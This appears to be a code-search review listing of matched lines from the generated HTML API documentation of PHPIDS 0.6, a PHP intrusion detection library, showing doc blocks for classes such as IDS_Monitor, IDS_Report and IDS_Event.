./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:5 (40/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Monitor</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:24 (41/257) OK | Dubious | Bad | Hide
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">Monitoring engine</p>
26-<p class="description"><p>This class represents the core of the frameworks attack detection mechanism  and provides functions to scan incoming data for malicious appearing script  fragments.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:158 (42/257) OK | Dubious | Bad | Hide
155-							
156-					</div>
157-		<div class="info-box-body">
158:			<a name="var$scanKeys" id="$scanKeys"><!-- --></A>
159-<div class="oddrow">
160-
161-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:169 (43/257) OK | Dubious | Bad | Hide
166-		</span>
167-	</div>
168-
169:	<!-- ========== Info from phpDoc block ========= -->
170-<p class="short-description">Scan keys switch</p>
171-<p class="description"><p>Enabling this property will cause the monitor to scan both the key and  the value of variables</p></p>
172-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:197 (44/257) OK | Dubious | Bad | Hide
194-		<div class="info-box-body">
195-			<A NAME='method_detail'></A>
196-
197:<a name="method__construct" id="__construct"><!-- --></a>
198-<div class="evenrow">
199-	
200-	<div class="method-header">
201-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">175</span>)
202-	</div> 
203-	
204:	<!-- ========== Info from phpDoc block ========= -->
205-<p class="short-description">Constructor</p>
206-	<ul class="tags">
207-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:232 (45/257) OK | Dubious | Bad | Hide
229-		
230-			
231-	</div>
232:<a name="methodaddHtml" id="addHtml"><!-- --></a>
233-<div class="oddrow">
234-	
235-	<div class="method-header">
236-		<span class="method-title">addHtml</span> (line <span class="line-number">589</span>)
237-	</div> 
238-	
239:	<!-- ========== Info from phpDoc block ========= -->
240-<p class="short-description">Adds a value to the html array</p>
241-	<ul class="tags">
242-				<li><span class="field">since:</span> 0.5</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:262 (46/257) OK | Dubious | Bad | Hide
259-		
260-			
261-	</div>
262:<a name="methodaddJson" id="addJson"><!-- --></a>
263-<div class="evenrow">
264-	
265-	<div class="method-header">
266-		<span class="method-title">addJson</span> (line <span class="line-number">630</span>)
267-	</div> 
268-	
269:	<!-- ========== Info from phpDoc block ========= -->
270-<p class="short-description">Adds a value to the json array</p>
271-	<ul class="tags">
272-				<li><span class="field">since:</span> 0.5.3</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:292 (47/257) OK | Dubious | Bad | Hide
289-		
290-			
291-	</div>
292:<a name="methodgetExceptions" id="getExceptions"><!-- --></a>
293-<div class="oddrow">
294-	
295-	<div class="method-header">
296-		<span class="method-title">getExceptions</span> (line <span class="line-number">560</span>)
297-	</div> 
298-	
299:	<!-- ========== Info from phpDoc block ========= -->
300-<p class="short-description">Returns exception array</p>
301-	<ul class="tags">
302-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:316 (48/257) OK | Dubious | Bad | Hide
313-		
314-			
315-	</div>
316:<a name="methodgetHtml" id="getHtml"><!-- --></a>
317-<div class="evenrow">
318-	
319-	<div class="method-header">
320-		<span class="method-title">getHtml</span> (line <span class="line-number">601</span>)
321-	</div> 
322-	
323:	<!-- ========== Info from phpDoc block ========= -->
324-<p class="short-description">Returns html array</p>
325-	<ul class="tags">
326-				<li><span class="field">return:</span> the fields that contain allowed html</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:342 (49/257) OK | Dubious | Bad | Hide
339-		
340-			
341-	</div>
342:<a name="methodgetJson" id="getJson"><!-- --></a>
343-<div class="oddrow">
344-	
345-	<div class="method-header">
346-		<span class="method-title">getJson</span> (line <span class="line-number">642</span>)
347-	</div> 
348-	
349:	<!-- ========== Info from phpDoc block ========= -->
350-<p class="short-description">Returns json array</p>
351-	<ul class="tags">
352-				<li><span class="field">return:</span> the fields that contain json</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:368 (50/257) OK | Dubious | Bad | Hide
365-		
366-			
367-	</div>
368:<a name="methodgetReport" id="getReport"><!-- --></a>
369-<div class="evenrow">
370-	
371-	<div class="method-header">
372-		<span class="method-title">getReport</span> (line <span class="line-number">664</span>)
373-	</div> 
374-	
375:	<!-- ========== Info from phpDoc block ========= -->
376-<p class="short-description">Returns report object providing various functions to work with  detected results. Also the centrifuge data is being set as property  of the report object.</p>
377-	<ul class="tags">
378-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:392 (51/257) OK | Dubious | Bad | Hide
389-		
390-			
391-	</div>
392:<a name="methodgetStorage" id="getStorage"><!-- --></a>
393-<div class="oddrow">
394-	
395-	<div class="method-header">
396-		<span class="method-title">getStorage</span> (line <span class="line-number">652</span>)
397-	</div> 
398-	
399:	<!-- ========== Info from phpDoc block ========= -->
400-<p class="short-description">Returns storage container</p>
401-	<ul class="tags">
402-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:416 (52/257) OK | Dubious | Bad | Hide
413-		
414-			
415-	</div>
416:<a name="methodrun" id="run"><!-- --></a>
417-<div class="evenrow">
418-	
419-	<div class="method-header">
420-		<span class="method-title">run</span> (line <span class="line-number">233</span>)
421-	</div> 
422-	
423:	<!-- ========== Info from phpDoc block ========= -->
424-<p class="short-description">Starts the scan mechanism</p>
425-	<ul class="tags">
426-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:440 (53/257) OK | Dubious | Bad | Hide
437-		
438-			
439-	</div>
440:<a name="methodsetExceptions" id="setExceptions"><!-- --></a>
441-<div class="oddrow">
442-	
443-	<div class="method-header">
444-		<span class="method-title">setExceptions</span> (line <span class="line-number">546</span>)
445-	</div> 
446-	
447:	<!-- ========== Info from phpDoc block ========= -->
448-<p class="short-description">Sets exception array</p>
449-	<ul class="tags">
450-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:469 (54/257) OK | Dubious | Bad | Hide
466-		
467-			
468-	</div>
469:<a name="methodsetHtml" id="setHtml"><!-- --></a>
470-<div class="evenrow">
471-	
472-	<div class="method-header">
473-		<span class="method-title">setHtml</span> (line <span class="line-number">573</span>)
474-	</div> 
475-	
476:	<!-- ========== Info from phpDoc block ========= -->
477-<p class="short-description">Sets html array</p>
478-	<ul class="tags">
479-				<li><span class="field">since:</span> 0.5</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Monitor.html:499 (55/257) OK | Dubious | Bad | Hide
496-		
497-			
498-	</div>
499:<a name="methodsetJson" id="setJson"><!-- --></a>
500-<div class="oddrow">
501-	
502-	<div class="method-header">
503-		<span class="method-title">setJson</span> (line <span class="line-number">614</span>)
504-	</div> 
505-	
506:	<!-- ========== Info from phpDoc block ========= -->
507-<p class="short-description">Sets json array</p>
508-	<ul class="tags">
509-				<li><span class="field">since:</span> 0.5.3</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:5 (56/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Report</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:29 (57/257) OK | Dubious | Bad | Hide
26-            <ul>
27-                <li>Countable (internal interface)</li><li>IteratorAggregate (internal interface)</li>            </ul>
28-        </p>
29:        		<!-- ========== Info from phpDoc block ========= -->
30-<p class="short-description">PHPIDS report object</p>
31-<p class="description"><p>The report objects collects a number of events and thereby presents the  detected results. It provides a convenient API to work with the results.</p><p>Note that this class implements Countable, IteratorAggregate and  a __toString() method</p></p>
32-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:180 (58/257) OK | Dubious | Bad | Hide
177-							
178-					</div>
179-		<div class="info-box-body">
180:			<a name="var$centrifuge" id="$centrifuge"><!-- --></A>
181-<div class="oddrow">
182-
183-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:191 (59/257) OK | Dubious | Bad | Hide
188-		</span>
189-	</div>
190-
191:	<!-- ========== Info from phpDoc block ========= -->
192-<p class="short-description">Centrifuge data</p>
193-<p class="description"><p>This variable - initiated as an empty array - carries all information  about the centrifuge data if available</p></p>
194-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:203 (60/257) OK | Dubious | Bad | Hide
200-		
201-
202-</div>
203:<a name="var$events" id="$events"><!-- --></A>
204-<div class="evenrow">
205-
206-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:214 (61/257) OK | Dubious | Bad | Hide
211-		</span>
212-	</div>
213-
214:	<!-- ========== Info from phpDoc block ========= -->
215-<p class="short-description">Event container</p>
216-	<ul class="tags">
217-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:225 (62/257) OK | Dubious | Bad | Hide
222-		
223-
224-</div>
225:<a name="var$impact" id="$impact"><!-- --></A>
226-<div class="oddrow">
227-
228-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:236 (63/257) OK | Dubious | Bad | Hide
233-		</span>
234-	</div>
235-
236:	<!-- ========== Info from phpDoc block ========= -->
237-<p class="short-description">Impact level</p>
238-<p class="description"><p>The impact level is calculated on demand by adding the results of the  event objects on IDS_Report-&gt;getImpact()</p></p>
239-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:248 (64/257) OK | Dubious | Bad | Hide
245-		
246-
247-</div>
248:<a name="var$tags" id="$tags"><!-- --></A>
249-<div class="evenrow">
250-
251-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:259 (65/257) OK | Dubious | Bad | Hide
256-		</span>
257-	</div>
258-
259:	<!-- ========== Info from phpDoc block ========= -->
260-<p class="short-description">List of affected tags</p>
261-<p class="description"><p>This list of tags is collected from the collected event objects on  demand when IDS_Report-&gt;getTags() is called</p></p>
262-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:287 (66/257) OK | Dubious | Bad | Hide
284-		<div class="info-box-body">
285-			<A NAME='method_detail'></A>
286-
287:<a name="method__construct" id="__construct"><!-- --></a>
288-<div class="oddrow">
289-	
290-	<div class="method-header">
291-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">100</span>)
292-	</div> 
293-	
294:	<!-- ========== Info from phpDoc block ========= -->
295-<p class="short-description">Constructor</p>
296-	<ul class="tags">
297-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:316 (67/257) OK | Dubious | Bad | Hide
313-		
314-			
315-	</div>
316:<a name="methodaddEvent" id="addEvent"><!-- --></a>
317-<div class="evenrow">
318-	
319-	<div class="method-header">
320-		<span class="method-title">addEvent</span> (line <span class="line-number">116</span>)
321-	</div> 
322-	
323:	<!-- ========== Info from phpDoc block ========= -->
324-<p class="short-description">Adds an IDS_Event object to the report</p>
325-	<ul class="tags">
326-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:345 (68/257) OK | Dubious | Bad | Hide
342-		
343-			
344-	</div>
345:<a name="methodclear" id="clear"><!-- --></a>
346-<div class="oddrow">
347-	
348-	<div class="method-header">
349-		<span class="method-title">clear</span> (line <span class="line-number">248</span>)
350-	</div> 
351-	
352:	<!-- ========== Info from phpDoc block ========= -->
353-<p class="short-description">Clears calculated/collected values</p>
354-	<ul class="tags">
355-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:369 (69/257) OK | Dubious | Bad | Hide
366-		
367-			
368-	</div>
369:<a name="methodcount" id="count"><!-- --></a>
370-<div class="evenrow">
371-	
372-	<div class="method-header">
373-		<span class="method-title">count</span> (line <span class="line-number">214</span>)
374-	</div> 
375-	
376:	<!-- ========== Info from phpDoc block ========= -->
377-<p class="short-description">Returns total amount of events</p>
378-	<ul class="tags">
379-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:398 (70/257) OK | Dubious | Bad | Hide
395-					</dl>
396-			
397-	</div>
398:<a name="methodgetCentrifuge" id="getCentrifuge"><!-- --></a>
399-<div class="oddrow">
400-	
401-	<div class="method-header">
402-		<span class="method-title">getCentrifuge</span> (line <span class="line-number">260</span>)
403-	</div> 
404-	
405:	<!-- ========== Info from phpDoc block ========= -->
406-<p class="short-description">This method returns the centrifuge property or null if not  filled with data</p>
407-	<ul class="tags">
408-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:422 (71/257) OK | Dubious | Bad | Hide
419-		
420-			
421-	</div>
422:<a name="methodgetEvent" id="getEvent"><!-- --></a>
423-<div class="evenrow">
424-	
425-	<div class="method-header">
426-		<span class="method-title">getEvent</span> (line <span class="line-number">135</span>)
427-	</div> 
428-	
429:	<!-- ========== Info from phpDoc block ========= -->
430-<p class="short-description">Get event by name</p>
431-<p class="description"><p>In most cases an event is identified by the key of the variable that  contained maliciously appearing content</p></p>
432-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:454 (72/257) OK | Dubious | Bad | Hide
451-		
452-			
453-	</div>
454:<a name="methodgetImpact" id="getImpact"><!-- --></a>
455-<div class="oddrow">
456-	
457-	<div class="method-header">
458-		<span class="method-title">getImpact</span> (line <span class="line-number">179</span>)
459-	</div> 
460-	
461:	<!-- ========== Info from phpDoc block ========= -->
462-<p class="short-description">Returns total impact</p>
463-<p class="description"><p>Each stored IDS_Event object and its IDS_Filter sub-object are called  to calculate the overall impact level of this request</p></p>
464-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:479 (73/257) OK | Dubious | Bad | Hide
476-		
477-			
478-	</div>
479:<a name="methodgetIterator" id="getIterator"><!-- --></a>
480-<div class="evenrow">
481-	
482-	<div class="method-header">
483-		<span class="method-title">getIterator</span> (line <span class="line-number">228</span>)
484-	</div> 
485-	
486:	<!-- ========== Info from phpDoc block ========= -->
487-<p class="short-description">Return iterator object</p>
488-<p class="description"><p>In order to provide the possibility to directly iterate over the  IDS_Event object the IteratorAggregate is implemented. One can easily  use foreach() to iterate through all stored IDS_Event objects.</p></p>
489-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:509 (74/257) OK | Dubious | Bad | Hide
506-					</dl>
507-			
508-	</div>
509:<a name="methodgetTags" id="getTags"><!-- --></a>
510-<div class="oddrow">
511-	
512-	<div class="method-header">
513-		<span class="method-title">getTags</span> (line <span class="line-number">155</span>)
514-	</div> 
515-	
516:	<!-- ========== Info from phpDoc block ========= -->
517-<p class="short-description">Returns list of affected tags</p>
518-	<ul class="tags">
519-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:533 (75/257) OK | Dubious | Bad | Hide
530-		
531-			
532-	</div>
533:<a name="methodhasEvent" id="hasEvent"><!-- --></a>
534-<div class="evenrow">
535-	
536-	<div class="method-header">
537-		<span class="method-title">hasEvent</span> (line <span class="line-number">200</span>)
538-	</div> 
539-	
540:	<!-- ========== Info from phpDoc block ========= -->
541-<p class="short-description">Checks if a specific event with given name exists</p>
542-	<ul class="tags">
543-				<li><span class="field">throws:</span> InvalidArgumentException if argument is illegal</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:563 (76/257) OK | Dubious | Bad | Hide
560-		
561-			
562-	</div>
563:<a name="methodisEmpty" id="isEmpty"><!-- --></a>
564-<div class="oddrow">
565-	
566-	<div class="method-header">
567-		<span class="method-title">isEmpty</span> (line <span class="line-number">238</span>)
568-	</div> 
569-	
570:	<!-- ========== Info from phpDoc block ========= -->
571-<p class="short-description">Checks if any events are registered</p>
572-	<ul class="tags">
573-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:587 (77/257) OK | Dubious | Bad | Hide
584-		
585-			
586-	</div>
587:<a name="methodsetCentrifuge" id="setCentrifuge"><!-- --></a>
588-<div class="evenrow">
589-	
590-	<div class="method-header">
591-		<span class="method-title">setCentrifuge</span> (line <span class="line-number">275</span>)
592-	</div> 
593-	
594:	<!-- ========== Info from phpDoc block ========= -->
595-<p class="short-description">This method sets the centrifuge property</p>
596-	<ul class="tags">
597-				<li><span class="field">return:</span> true is arguments were valid</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Report.html:618 (78/257) OK | Dubious | Bad | Hide
615-		
616-			
617-	</div>
618:<a name="method__toString" id="__toString"><!-- --></a>
619-<div class="oddrow">
620-	
621-	<div class="method-header">
622-		<span class="method-title">__toString</span> (line <span class="line-number">289</span>)
623-	</div> 
624-	
625:	<!-- ========== Info from phpDoc block ========= -->
626-<p class="short-description">Directly outputs all available information</p>
627-	<ul class="tags">
628-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---File.php.html:5 (79/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page File.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---File.php.html:23 (80/257) OK | Dubious | Bad | Hide
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---File.php.html:72 (81/257) OK | Dubious | Bad | Hide
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Caching/Interface_php"><!-- --></a>
73-<div class="oddrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---File.php.html:83 (82/257) OK | Dubious | Bad | Hide
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:5 (83/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_Database</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:28 (84/257) OK | Dubious | Bad | Hide
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Log_Interface.html">IDS_Log_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">Database logging wrapper</p>
30-<p class="description"><p>The database wrapper is designed to store reports into an sql database. It  implements the singleton pattern and is based in PDO, supporting  different database types.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:93 (85/257) OK | Dubious | Bad | Hide
90-		</div>
91-		<div class="info-box-body">
92-			<A NAME='method_detail'></A>
93:<a name="methodgetInstance" id="getInstance"><!-- --></a>
94-<div class="evenrow">
95-	
96-	<div class="method-header">
97-		<span class="method-title">static method getInstance</span> (line <span class="line-number">212</span>)
98-	</div> 
99-	
100:	<!-- ========== Info from phpDoc block ========= -->
101-<p class="short-description">Returns an instance of this class</p>
102-<p class="description"><p>This method allows the passed argument to be either an instance of IDS_Init or  an array.</p></p>
103-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:125 (86/257) OK | Dubious | Bad | Hide
122-			
123-	</div>
124-
125:<a name="method__construct" id="__construct"><!-- --></a>
126-<div class="oddrow">
127-	
128-	<div class="method-header">
129-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">146</span>)
130-	</div> 
131-	
132:	<!-- ========== Info from phpDoc block ========= -->
133-<p class="short-description">Constructor</p>
134-<p class="description"><p>Prepares the SQL statement</p></p>
135-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Database.html:155 (87/257) OK | Dubious | Bad | Hide
152-		
153-			
154-	</div>
155:<a name="methodexecute" id="execute"><!-- --></a>
156-<div class="evenrow">
157-	
158-	<div class="method-header">
159-		<span class="method-title">execute</span> (line <span class="line-number">246</span>)
160-	</div> 
161-	
162:	<!-- ========== Info from phpDoc block ========= -->
163-<p class="short-description">Stores given data into the database</p>
164-	<ul class="tags">
165-				<li><span class="field">throws:</span> Exception if db error occurred</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:5 (88/257) OK | Dubious | Bad | Hide
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Event</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:29 (89/257) OK | Dubious | Bad | Hide
26-            <ul>
27-                <li>Countable (internal interface)</li><li>IteratorAggregate (internal interface)</li>            </ul>
28-        </p>
29:        		<!-- ========== Info from phpDoc block ========= -->
30-<p class="short-description">PHPIDS event object</p>
31-<p class="description"><p>This class represents a certain event that occured while applying the filters  to the supplied data. It aggregates a bunch of IDS_Filter implementations and  is a assembled in IDS_Report.</p><p>Note that this class implements both Countable and IteratorAggregate</p></p>
32-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:159 (90/257) OK | Dubious | Bad | Hide
156-							
157-					</div>
158-		<div class="info-box-body">
159:			<a name="var$filters" id="$filters"><!-- --></A>
160-<div class="evenrow">
161-
162-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:170 (91/257) OK | Dubious | Bad | Hide
167-		</span>
168-	</div>
169-
170:	<!-- ========== Info from phpDoc block ========= -->
171-<p class="short-description">List of filter objects</p>
172-<p class="description"><p>Filter objects in this array are those that matched the events value</p></p>
173-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:182 (92/257) OK | Dubious | Bad | Hide
179-		
180-
181-</div>
182:<a name="var$impact" id="$impact"><!-- --></A>
183-<div class="oddrow">
184-
185-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:193 (93/257) OK | Dubious | Bad | Hide
190-		</span>
191-	</div>
192-
193:	<!-- ========== Info from phpDoc block ========= -->
194-<p class="short-description">Calculated impact</p>
195-<p class="description"><p>Total impact of the event</p></p>
196-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:205 (94/257) OK | Dubious | Bad | Hide
202-		
203-
204-</div>
205:<a name="var$name" id="$name"><!-- --></A>
206-<div class="evenrow">
207-
208-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:216 (95/257) OK | Dubious | Bad | Hide
213-		</span>
214-	</div>
215-
216:	<!-- ========== Info from phpDoc block ========= -->
217-<p class="short-description">Event name</p>
218-	<ul class="tags">
219-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:227 (96/257) OK | Dubious | Bad | Hide
224-		
225-
226-</div>
227:<a name="var$tags" id="$tags"><!-- --></A>
228-<div class="oddrow">
229-
230-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:238 (97/257) OK | Dubious | Bad | Hide
235-		</span>
236-	</div>
237-
238:	<!-- ========== Info from phpDoc block ========= -->
239-<p class="short-description">Affecte tags</p>
240-	<ul class="tags">
241-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:249 (98/257) OK | Dubious | Bad | Hide
246-		
247-
248-</div>
249:<a name="var$value" id="$value"><!-- --></A>
250-<div class="evenrow">
251-
252-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:260 (99/257) OK | Dubious | Bad | Hide
257-		</span>
258-	</div>
259-
260:	<!-- ========== Info from phpDoc block ========= -->
261-<p class="short-description">Value of the event</p>
262-	<ul class="tags">
263-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:287 (100/257) OK | Dubious | Bad | Hide
284-		<div class="info-box-body">
285-			<A NAME='method_detail'></A>
286-
287:<a name="method__construct" id="__construct"><!-- --></a>
288-<div class="oddrow">
289-	
290-	<div class="method-header">
291-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">106</span>)
292-	</div> 
293-	
294:	<!-- ========== Info from phpDoc block ========= -->
295-<p class="short-description">Constructor</p>
296-<p class="description"><p>Fills event properties</p></p>
297-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:323 (101/257) OK | Dubious | Bad | Hide
320-		
321-			
322-	</div>
323:<a name="methodcount" id="count"><!-- --></a>
324-<div class="evenrow">
325-	
326-	<div class="method-header">
327-		<span class="method-title">count</span> (line <span class="line-number">211</span>)
328-	</div> 
329-	
330:	<!-- ========== Info from phpDoc block ========= -->
331-<p class="short-description">Returns number of filters</p>
332-<p class="description"><p>To implement interface Countable this returns the number of filters  appended.</p></p>
333-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Event.html:353 (102/257) OK | Dubious | Bad | Hide
350-					</dl>
351-			
352-	</div>
353:<a name="methodgetFilters" id="getFilters"><!-- --></a>
354-<div class="oddrow">
355-	
356-	<div class="method-header">
357-		<span class="method-title">getFilters</span> (line <span class="line-number">198</span>)
358-	</div> 
359-	
360:	<!-- ========== Info from phpDoc block ========= -->
361-<p class="short-description">Returns list of filter objects</p>
362-	<ul class="tags">
